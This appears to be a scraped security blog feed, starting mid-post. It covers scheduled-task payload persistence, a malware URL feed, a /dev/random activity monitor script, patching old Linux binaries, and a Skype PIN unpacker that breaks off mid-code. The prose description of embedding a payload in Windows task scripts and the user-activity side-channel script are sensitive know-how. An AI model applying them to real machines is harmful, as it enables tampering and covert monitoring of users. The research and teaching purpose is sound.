This scheduled task runs the <strong>Gatherwirelessinfo.vbs</strong> file to collect wireless networking data. This scheduled task collects configuration information and state information about the computer. This information is displayed in a report. This information is included in the system logs. This information also appears in Performance Monitor.
</td>
</tr>
<tr>
<td>
GatherWiredInfo
</td>
<td>
Wired
</td>
<td>
This scheduled task runs the <strong>Gatherwiredinfo.vbs</strong> file to collect wired networking data. This scheduled task collects configuration information and state information about the system. This information appears in a report. This information also appears in the system logs. This information also appears in Performance Monitor.
</td>
</tr>
</table>
<p>We have 2 default installed tasks (Wireless and Wired) in Windows Vista that uses 2 VBS scripts (which are text files). So, it’s as easy as grabbing a copy of those files and modifying them to embed our payload (the previous VBS script) and then overwrite one or both of them. That’s all. Nevertheless, it doesn’t work on at least Windows 7 as this task is not there any more.</p>
<p><strong>Conclusion</strong></p>
<p>Although the exploitation techniques explained here are not new I think that such a list can be useful. For example. I was unaware of the .MOF files feature and it could have helped me in the past. Perhaps this list can be of help for somebody else.</p>
<p>PS: If you happen to know another cool technique, please post it in the comments!</p>joxeanAuditing a product recently I noticed a curious scenario where I control the following:Malware URLs2013-01-26T09:37:56+01:002013-01-26T09:37:56+01:00http://joxeankoret.com/blog/2013/01/26/malware-urls<p>It’s been a while since I started writing <a href="http://joxeankoret.com/blog/2012/08/25/finding-malware-spam-in-twitter/">a first prototype</a> to try to catch as much malware (URLs and samples) as possible. Today I can say my project is all grown up as it’s generating, daily, a feed with around 9.000 malware URLs and with a low rate of false positives (although there may be some).</p>
<p>The process of finding malware URLs in my tool used to be only a matter of finding suspicious URLs in social networks (Twitter and Identi.ca), checking mail accounts receiving loads of bad stuff and nothing else. At first. Today I’m using crawlers, honeypots, sandboxes, thirdy party public URL feeds, private URL feeds (provided under consent), executable unpackers, heuristic engines for Flash movies, PDFs, OLE2 documents, etc… It changed a lot and became a big project that, I hope, can give useful information for malware researchers.</p>
<p> <!--more--></p>
<p>As of today, the final result the general public can see, is just a single plain text file, that can be used with <a href="http://adblockplus.org/">AdBlock</a>, with all the URLs of the last week (you can grab the latest version of the feed in this <a href="http://malwareurls.joxeankoret.com/normal.txt">link</a>). However, in some weeks (perhaps months) we plan (a friend of mine and I) to add a web page and publish an API to let users do, at least, the following actions:</p>
<ol>
<li>Check URLs</li>
<li>Find URLs or domains</li>
<li>Find how a malware appeared/spread</li>
<li>Find similar malwares during a given time frame</li>
<li>Setup notifications for known malwares reappearing</li>
<li>Setup notifications for similare malwares</li>
<li>Setup notifications for similar URL patterns</li>
<li>etc…</li>
</ol>
<p>It will take a while to finish the web page and the API service, but it should be finished in a couple of weeks (if our works permits, as it’s a side project we work on our spare time).</p>
<p>Meanwhile, while my friend and I continue working on this project, we want to show you some fancy graphs of the statistics of this project:</p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/daily_urls/" rel="attachment wp-att-3394"><img class="aligncenter size-large wp-image-3394" alt="daily_urls" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-1024x277.png" width="550" height="148" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-1024x277.png 1024w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-300x81.png 300w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls.png 1174w" sizes="(max-width: 550px) 100vw, 550px" /></a></p>
<p> </p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/heuristics/" rel="attachment wp-att-3396"><img class="aligncenter size-full wp-image-3396" alt="Heuristics" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics.png" width="463" height="351" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics.png 463w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics-300x227.png 300w" sizes="(max-width: 463px) 100vw, 463px" /></a></p>
<p> </p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/full_av_names/" rel="attachment wp-att-3398"><img class="aligncenter size-full wp-image-3398" alt="full_av_names" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names.png" width="545" height="392" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names.png 545w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names-300x215.png 300w" sizes="(max-width: 545px) 100vw, 545px" /></a></p>
<p> </p>
<p>NOTE: The Antivirus information is obtained thanks to <a href="http://www.virustotal.com">VirusTotal</a>.</p>
<p> </p>joxeanIt’s been a while since I started writing a first prototype to try to catch as much malware (URLs and samples) as possible. Today I can say my project is all grown up as it’s generating, daily, a feed with around 9.000 malware URLs and with a low rate of false positives (although there may be some).A simple activity monitor with /dev/random2012-11-24T18:01:55+01:002012-11-24T18:01:55+01:00http://joxeankoret.com/blog/2012/11/24/a-simple-activity-monitor-with-devrandom<p>Today I was performing some tests in the random number generators of some browsers and found, by chance, <a href="http://www.ouah.org/entropykeystroke.html">this mail</a> sent to <a href="http://www.securityfocus.com/archive/1">Bugtraq</a> by Michal Zalewsky called “Unix entropy source can be used for keystroke timing attacks”. While the idea of Michal is very good, I failed to find a reliable way of doing it in my house computer after some time (well, honestly, after just 1 hour…). However, a more simpler idea come to my mind: if /dev/random blocks when the entropy pool is empty and most of the events are generated when mouse or keyboard events happens, at least, I can write quite easily an activity monitor based on /dev/random.</p>
<!--more-->
<p><strong>A simple activity monitor</strong></p>
<p>The idea is very simple: read all available data in /dev/random and then, depending on the intervals new data is available, try to determine if the mouse or keyboard is being used. For this I created the following simple Python script:</p>
<div class="geshi no python">
<div class="head">
#!/usr/bin/python
</div>
<ol>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">import</span> <span class="kw3">time</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">import</span> <span class="kw3">select</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
ACTIVITY_MOUSE = <span class="nu0"></span>
</div>
</li>
<li class="li1">
<div class="de1">
ACTIVITY_KEYBOARD = <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">def</span> wait_for_activity<span class="br0">(</span><span class="br0">)</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="st0">""</span><span class="st0">" Returns (0, time) for mouse and (1, time) for keyboard activity.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="st0"> Note, however, that the metrics are just a guess. "</span><span class="st0">""</span>
</div>
</li>
<li class="li1">
<div class="de1">
started = <span class="kw2">True</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
f = <span class="kw2">open</span><span class="br0">(</span><span class="st0">"/dev/random"</span>, <span class="st0">"rb"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
f.<span class="me1">seek</span><span class="br0">(</span><span class="nu0">2</span>, <span class="nu0"></span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
keyboard = <span class="nu0"></span>
</div>
</li>
<li class="li1">
<div class="de1">
mouse = <span class="nu0"></span>
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="kw2">None</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">while</span> ret <span class="kw1">is</span> <span class="kw2">None</span>:
</div>
</li>
<li class="li1">
<div class="de1">
t = <span class="kw3">time</span>.<span class="kw3">time</span><span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw3">select</span>.<span class="kw3">select</span><span class="br0">(</span><span class="br0">[</span>f<span class="br0">]</span>, <span class="br0">[</span><span class="br0">]</span>, <span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
f.<span class="me1">read</span><span class="br0">(</span><span class="nu0">8</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
t = <span class="kw3">time</span>.<span class="kw3">time</span><span class="br0">(</span><span class="br0">)</span>-t
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> started:
</div>
</li>
<li class="li1">
<div class="de1">
started = <span class="kw2">False</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">continue</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> t <span class="sy0">&</span>lt<span class="sy0">;</span>= <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> mouse <span class="sy0">&</span>gt<span class="sy0">;</span>= <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="br0">(</span><span class="nu0"></span>, t<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
mouse += <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
keyboard -= <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">elif</span> t <span class="sy0">&</span>lt<span class="sy0">;</span>= <span class="nu0">5</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> keyboard <span class="sy0">&</span>gt<span class="sy0">;</span>= <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="br0">(</span><span class="nu0">1</span>, t<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
keyboard += <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
mouse -= <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
keyboard = mouse = <span class="nu0"></span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
f.<span class="me1">close</span><span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> ret
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">def</span> main<span class="br0">(</span><span class="br0">)</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">while</span> <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
act = wait_for_activity<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> act<span class="br0">[</span><span class="nu0"></span><span class="br0">]</span> == ACTIVITY_MOUSE:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">print</span> <span class="st0">"MOUSE ACTIVITY DETECTED"</span>, act<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">print</span> <span class="st0">"KEYBOARD ACTIVITY DETECTED"</span>, act<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> __name__ == <span class="st0">"__main__"</span>:
</div>
</li>
<li class="li1">
<div class="de1">
main<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
</ol>
</div>
<p>Execute this script and see if it works for you. In my case, for reading 8 bytes it typically takes 1 second or less when mouse events happens (normal stuff: browsing, reading mail, etc…) and 5 seconds or less for keystrokes. Some of the problems I noticed are, for example, that often the script thinks that when I’m writing mouse events are happening, when they are not (I think I type too fast for my script). In any case, more or less (in my home computer, at least) it’s working.</p>
<p>For next posts, hopefully, I’ll be able to write a working program for the (old) idea of Michal Zalewsky but, meanwhile, this is what I have working. I hope you find it interesting or useful. Bye!</p>
<p> </p>joxeanToday I was performing some tests in the random number generators of some browsers and found, by chance, this mail sent to Bugtraq by Michal Zalewsky called “Unix entropy source can be used for keystroke timing attacks”. While the idea of Michal is very good, I failed to find a reliable way of doing it in my house computer after some time (well, honestly, after just 1 hour…). However, a more simpler idea come to my mind: if /dev/random blocks when the entropy pool is empty and most of the events are generated when mouse or keyboard events happens, at least, I can write quite easily an activity monitor based on /dev/random.Patching old linux binaries to work with recent libc versions2012-11-14T18:45:02+01:002012-11-14T18:45:02+01:00http://joxeankoret.com/blog/2012/11/14/patching-old-linux-binaries-to-work-with-recent-libc-versions<p>From time to time I need to use some old binary created for older Linux versions like Redhat 6.2, for example. The problem with those binaries is that they were compiled with a very old version of the glibc and they cannot be run ‘like this’ in newer systems. Sometimes, just making a symbolic link from the new library to the old name can be enough but not always. In this brief post I will talk about how to workaround the typical relocation errors and undefined symbols problems with old binaries.</p>
<!--more-->
<p>For this article I will use a program and a library for the RSIB protocol (if you search for it in Google or another search engine, you will find the binaries online easily). The program is called ‘interactive’ and the library ‘librsib.so.1.0’. First of all, we need to check what symbols or libraries are missing. We can find it out by simply using the command ‘ldd’:</p>
<pre>$ ldd interactive
linux-gate.so.1 => (0xf7706000)
librsib.so => not found
libstdc++-libc6.1-1.so.2 => not found
libm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf76a9000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74ff000)
/lib/ld-linux.so.2 (0xf7707000)</pre>
<p> </p>
<p>So we’re missing libstdc++-libc6.1-1.so.2 and librsib.so. We need 2 symbolic links to those libraries. For the 1st, I’ll try to symbolic link to my current libstdc++ library and for the 2nd I just need to symbolic link to the librsib.so.1.0 library I already have:</p>
<pre>$ ln -s /usr/lib32/libstdc++.so.6 libstdc++-libc6.1-1.so.2
$ ln -s librsib.so.1.0 librsib.so
$ export LD_LIBRARY_PATH=`pwd`
$ $ ldd interactive
linux-gate.so.1 => (0xf77db000)
librsib.so => /home/joxean/somepath/librsib.so (0xf77cc000)
libstdc++-libc6.1-1.so.2 => /home/joxean/somepath/libstdc++-libc6.1-1.so.2 (0xf76e7000)
libm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf768c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74e2000)
/lib/ld-linux.so.2 (0xf77dc000)
libgcc_s.so.1 => /lib/i386-linux-gnu/libgcc_s.so.1 (0xf74c4000)</pre>
<p> </p>
<p>OK, it seems to work, let’s try to run it:</p>
<pre>$ ./interactive
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __tic</pre>
<p> </p>
<p>It wasn’t that easy. The symbol __tic is not defined in our libstdc++ version and librsib.so needs it. So, what we’re going to do is to create another library defining the symbols we need and patch the binaries (librsib.so and interactive) so they use our newly created library instead.</p>
<pre>$ cat > libkk.c
#include
int __tic(void)
{
return 0;
}
^C
$ gcc -shared -fPIC libkk.c -o libkk.so -shared</pre>
<p> </p>
<p>Now that we have our new library with the undefined symbol we need to patch the binaries and make them use libkk.so instead of the old libstdc++ versions they were linked against. I’ll use <a href="http://pyew.googlecode.com">Pyew</a> for this:</p>
<pre>$ pyew interactive
(...)
[0x00000000]> /s libstdc++
HINT[0x00000878]: libstdc++-libc6.1-1.so.2.libm.so.6.libc.so.6.strcpy.printf._
[0x00000000]> s 0x878
[0x00000878:0x08048878]> x
0878 6C 69 62 73 74 64 63 2B 2B 2D 6C 69 62 63 36 2E libstdc++-libc6.
0888 31 2D 31 2E 73 6F 2E 32 00 6C 69 62 6D 2E 73 6F 1-1.so.2.libm.so
0898 2E 36 00 6C 69 62 63 2E 73 6F 2E 36 00 73 74 72 .6.libc.so.6.str
08A8 63 70 79 00 70 72 69 6E 74 66 00 5F 5F 77 72 69 cpy.printf.__wri</pre>
<p> </p>
<p>The name of the libstdc++ library is in the offset 0x878, let’s do change it to our new library libkk.so by re-opening the file for editing and writing the new name:</p>
<pre>[0x00000878:0x08048878]> edit
[0x00000878:0x08048878]> wa libkk.so
[0x00000878:0x08048878]> s +8
[0x00000880:0x08048880]> wx 00
[0x00000880:0x08048880]> s 0x878
[0x00000878:0x08048878]> x
0878 6C 69 62 6B 6B 2E 73 6F 00 2D 6C 69 62 63 36 2E libkk.so.-libc6.
0888 31 2D 31 2E 73 6F 2E 32 00 6C 69 62 6D 2E 73 6F 1-1.so.2.libm.so
0898 2E 36 00 6C 69 62 63 2E 73 6F 2E 36 00 73 74 72 .6.libc.so.6.str
08A8 63 70 79 00 70 72 69 6E 74 66 00 5F 5F 77 72 69 cpy.printf.__wri
[0x00000878:0x08048878]> q</pre>
<p> </p>
<p>We have to patch the library librsib.so like we did with the binary ‘interactive’ (I’m skipping this step here as it’s equal). Now, let’s see what happens when running again the binary:</p>
<pre>$ ./interactive
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __builtin_new</pre>
<p>Another undefined symbol we have to implement in our libray. The function __builtin_new seems to be to allocate memory. Looking in IDA the binary interactive it seems it only receives one parameter which, I guess, is the size of the memory to reserve:</p>
<pre>.text:00006159 align 10h
.text:00006160
.text:00006160 loc_6160: ; CODE XREF: Connect__38CClientInetCommunicationChannelFactoryPCcN21+F9j
.text:00006160 push 1Ch ; size parameter
.text:00006162 call ___builtin_new</pre>
<p> </p>
<p>So we need to edit again the source of libkk and add this new symbol:</p>
<pre>$ cat libkk.c
#include
#include
#include
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
$ gcc -shared -fPIC libkk.c -o libkk.so -shared -m32
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
./interactive: symbol lookup error: ./interactive: undefined symbol: __builtin_vec_new</pre>
<p> </p>
<p>We can run some parts of the binary! But we need to define new more symbols. In this case, __builtin_vec_new. It seems to be (looking the ‘interactive’ binary in IDA and finding a bit in the internet) that this function does effectively the same as __builtin_new so, let’s edit again our library source:</p>
<pre>$ cat libkk.c
#include
#include
#include
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
$ gcc -shared -fPIC libkk.c -o libkk.so -shared -m32
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
./interactive: symbol lookup error: ./interactive: undefined symbol: __builtin_vec_delete</pre>
<p> </p>
<p>Looks better, we have been able to reach the program’s prompt but, again, we have another undefined symbol: __builtin_vec_delete. After briefly checking in IDA that it only receives one parameter and considering that we wrapped the old symbols with mallocs, it’s clear that we need to wrap free in this function, let’s do this:</p>
<pre>$ cat libkk.c
#include
#include
#include
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
void __builtin_vec_delete(void *ptr)
{
free(ptr);
}
$ gcc -shared -fPIC libkk.c -o libkk.so -shared -m32
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __builtin_delete</pre>
<p> </p>
<p>Still one more undefined symbol. Exactly the same function as before with just a different name, let’s implement it, build the library and execute the binary again:</p>
<pre>$ cat libkk.c
#include
#include
#include
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
void __builtin_vec_delete(void *ptr)
{
free(ptr);
}
void __builtin_delete(void *ptr)
{
free(ptr);
}
$ gcc -shared -fPIC libkk.c -o libkk.so -shared -m32
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
$</pre>
<p>Hurra! Finally, we can run our old binary in the new system without errors (or at least what I tested). I hope this brief post may help somebody out there if (s)he ever finds her/himself in the same problem.</p>
<p>PS: Thanks to pancake for helping me with it some time ago!</p>
<p> </p>joxeanFrom time to time I need to use some old binary created for older Linux versions like Redhat 6.2, for example. The problem with those binaries is that they were compiled with a very old version of the glibc and they cannot be run ‘like this’ in newer systems. Sometimes, just making a symbolic link from the new library to the old name can be enough but not always. In this brief post I will talk about how to workaround the typical relocation errors and undefined symbols problems with old binaries.A simple PIN tool unpacker for the Linux version of Skype2012-11-04T09:55:13+01:002012-11-04T09:55:13+01:00http://joxeankoret.com/blog/2012/11/04/a-simple-pin-tool-unpacker-for-the-linux-version-of-skype<p>Some time ago I wanted to take a look to <a href="http://www.skype.com">Skype</a> to see how it works and get the classes diagram of this program but, surprise: It’s packed. The Windows version is protected with a crypter of their own, (UPDATE: this statement was wrong: <del>the last time I checked it, was protected with <a href="www.oreans.com/es/themida.php">Themida</a></del>. It was Spotify the application protected with Themida). However, as I expected, the Linux version was simply packed (not protected) and with something easy to unpack. To unpack Skype and be able to analyse it in IDA and, also, to learn a bit how <a href="http://www.pintool.org">Intel PIN</a> works, I have written a PIN tool to “automatically” unpack Skype.</p>
<!--more-->
<p><strong>Skype packer for Linux</strong></p>
<p>The packer used in Skype is pretty straightforward to unpack and we don’t really need an unpacker for it: if we just want to analyse it in IDA Pro we can simply do the following:</p>
<ol>
<li>Open it in IDA and let it finish the auto analysis.</li>
<li>Put an “execute” hardware breakpoint at entry point.</li>
<li>Execute it until the breakpoint is hit the 2nd time.</li>
<li>Take a memory snapshot of the loader segments in IDA.</li>
</ol>
<p>This is how it looks like before unpacking, right after the initial auto-analysis performed by IDA Pro:</p>
<div id="attachment_2203" style="width: 560px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin.png"><img class="size-large wp-image-2203" title="Skype binary before unpacking it in IDA" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-1024x666.png" alt="Skype binary before unpacking it in IDA" width="550" height="357" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-1024x666.png 1024w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-300x195.png 300w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin.png 1134w" sizes="(max-width: 550px) 100vw, 550px" /></a>
<p class="wp-caption-text">
Skype binary before unpacking it in IDA
</p>
</div>
<p>And this is how it looks like after the hardware breakpoint is hit the 2nd time:</p>
<div id="attachment_2204" style="width: 572px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png"><img class=" wp-image-2204 " title="Skype unpacked" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png" alt="Skype unpacked" width="562" height="383" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png 975w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked-300x204.png 300w" sizes="(max-width: 562px) 100vw, 562px" /></a>
<p class="wp-caption-text">
Skype unpacked, displaying the typical GCC’s compiled code entry point
</p>
</div>
<p>But, as previously stated, for learning a bit how Intel PIN works I decided to write a simple “write and exec” unpacker for Skype and connect IDA Pro with PIN via GDB server to take a memory snapshot when done. Also, it will be useful to unpack other simple packers, not just to unpack the Skype’s Linux binary.</p>
<p><strong>Intel PIN</strong></p>
<p>PIN is a binary instrumentation framework created by Intel for x86 and x86_64 that let us instrument code for any application written for those processors (in the past there was support for ARM and Itanium too, IIRC). Basically, it works by rewriting the real code the application executes inserting our instrumentation code at different granularities (instruction level, basic block level, etc…) A simple PIN tool looks like the following (extracted from the PIN example tool):</p>
<div class="geshi no c">
<div class="head">
// Instruction count example
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="co1">// Actual instrumentation code</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> docount<span class="br0">(</span><span class="br0">)</span> <span class="br0">{</span> icount<span class="sy0">++</span>; <span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Code to check if we need to instrument an instruction</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> Instruction<span class="br0">(</span>INS ins, <span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Insert a call to docount before every instruction, no arguments are passed</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>docount, IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">void</span> Usage<span class="br0">(</span><span class="kw4">void</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
…
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// PIN stuff and instrumentation initialization</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">int</span> main<span class="br0">(</span><span class="kw4">int</span> argc, <span class="kw4">char</span> <span class="sy0">*</span> argv<span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Initialize pin</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span>PIN_Init<span class="br0">(</span>argc, argv<span class="br0">)</span><span class="br0">)</span> <span class="kw1">return</span> Usage<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register Instruction to be called to instrument instructions</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_AddInstrumentFunction<span class="br0">(</span>Instruction, <span class="nu0"></span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Start the program, never returns</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_StartProgram<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> <span class="nu0"></span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>In main we initialize PIN stuff, setup instruction level instrumentation and executes the program (PIN_StartProgram). Then, for every new instruction discovered by PIN, the callback “Instruction” will be called. In this callback we decide what instructions we want to actually instrument by calling INS_InsertCall. Then, before the instruction is executed the callback “docount” will be executed. And that is, we have a working example to count the number of instructions a program executes.</p>
<p><strong>GDB Server</strong></p>
<p>In my opinion, one of the best features supported by Intel PIN is the “-appdebug” command line switch. This switch tells PIN to start a GDB server to debug the application. We can use this feature to debug from IDA Pro any application using PIN using the remote GDB debugger. The unique “problem” (not really a problem, just annoying) is that we cannot specify the port PIN will listen in as it will be randomly selected and we need to change it in Debugger -> Process Options every time we execute PIN. For example, let’s say we want to debug skype running the inscount0 example from IDA with the GDB server we would execute a command like the following:</p>
<p><code class="language-plaintext highlighter-rouge">$ pin -appdebug -t source/tools/ManualExamples/obj-ia32/inscount0.so -- `which skype`<br />
Application stopped until continued from debugger.<br />
Start GDB, then issue this command at the (gdb) prompt:<br />
target remote :12587<br />
</code></p>
<p>And setup the remote GDB connection from IDA Pro using the specified port in the output of the command (Debugger -> Process Options):</p>
<p><a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png"><img class="aligncenter size-full wp-image-2214" title="idapin_gdb" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png" alt="" width="710" height="301" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png 710w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb-300x127.png 300w" sizes="(max-width: 710px) 100vw, 710px" /></a></p>
<p>After setting it up, click OK and select Debugger -> Attach to process from IDA. In the next dialog, just press OK when asked to which process we want to attach and that’s all, we are debugging the process with PIN from IDA.</p>
<p><strong>A simple “write and exec” unpacker</strong></p>
<p>Let’s go back to the main purpose of this post: writing an unpacker for Skype as a PIN tool. What I will do is to check if any instruction in the main binary (skype) modifies any of the application’s segments (for example, if it writes to the .text section), save them and, if the application jumps to execute code to any of the modified sections, raise an application breakpoint to inform the debugger the process seems to be unpacked. Is a pretty simple idea that works for simple packers, like the one used in Skype.</p>
<p>What I do in the PIN tool is, in the function main setup instrumentation granularity at trace level (basic block level) and install another callback that will be called right before the application starts:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">int</span> main<span class="br0">(</span><span class="kw4">int</span> argc, <span class="kw4">char</span> <span class="sy0">*</span>argv<span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Initialize PIN library. Print help message if -h(elp) is specified</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// in the command line or the command line is invalid </span>
</div>
</li>
<li class="li1">
<div class="de1">
